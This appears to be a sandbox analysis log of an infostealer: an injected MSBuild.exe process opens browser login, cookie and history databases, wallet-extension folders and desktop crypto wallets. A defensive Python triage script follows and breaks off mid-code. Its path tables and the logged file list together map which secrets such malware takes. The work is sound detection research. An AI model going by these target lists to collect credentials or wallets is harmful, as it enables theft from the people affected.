Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: Updater.exe Binary or memory string: WIN_81
Source: Updater.exe Binary or memory string: WIN_XP
Source: Updater.exe Binary or memory string: WIN_XPe
Source: Updater.exe Binary or memory string: WIN_VISTA
Source: is-7LJOT.tmp.3.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Updater.exe Binary or memory string: WIN_7
Source: Updater.exe Binary or memory string: WIN_8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 7552, type: MEMORYSTR
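The file-open events above share one shape: a process that has no business in a browser profile (here the injected MSBuild.exe) opens, in one sweep, the Chrome/Edge credential and cookie databases, the Firefox key4.db/logins.json pair (both are needed to decrypt saved Firefox logins), dozens of Chrome Web Store extension directories under Local/Sync Extension Settings (extension IDs are 32 characters drawn from a-p), and the desktop wallet directories listed at the end of the section. The triage helper below is an added example and is not part of the sandbox report or of the sample: it parses lines in the report's "Source: <process> File opened: <path>" form, buckets each target, and flags any non-browser process that touches a sensitive bucket. The sample events are constructed from the report's own MSBuild.exe paths plus one hypothetical benign chrome.exe line as a baseline; the category tables and the browser allowlist are assumptions a reader would adapt to their own environment.

```python
import re
from collections import defaultdict

# Constructed sample events in the report's "Source: <process> File opened: <path>"
# shape. The MSBuild.exe paths are taken from the report; the chrome.exe line is a
# hypothetical benign baseline (the browser opening its own profile).
SAMPLE_EVENTS = r"""
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
"""

# The trailing "Jump to behavior" link label of raw report exports is tolerated.
EVENT_RE = re.compile(r"^Source: (?P<proc>.+?) File opened: (?P<path>.+?)(?: Jump to behavior)?\s*$")
# Chrome Web Store extension IDs are 32 characters from a-p; [a-p]+ is used so that
# IDs truncated by a report export still land in the extension bucket.
EXT_RE = re.compile(r"\\(?:Local|Sync) Extension Settings\\([a-p]+)$")

# Category tables (assumed; extend for other browsers and wallets).
CREDENTIAL_FILES = {"Login Data", "Login Data For Account", "logins.json", "key4.db", "cert9.db"}
COOKIE_FILES = {"Cookies", "cookies.sqlite"}
HISTORY_FILES = {"History", "places.sqlite", "Web Data", "formhistory.sqlite"}
WALLET_MARKERS = ("\\Exodus\\", "\\Ledger Live", "\\atomic\\", "\\Coinomi\\", "\\Bitcoin\\wallets",
                  "\\Binance", "\\com.liberty.jaxx\\", "\\Electrum\\", "\\Electrum-LTC\\", "\\Guarda\\")
# Processes for which reading their own profile is expected (assumed allowlist).
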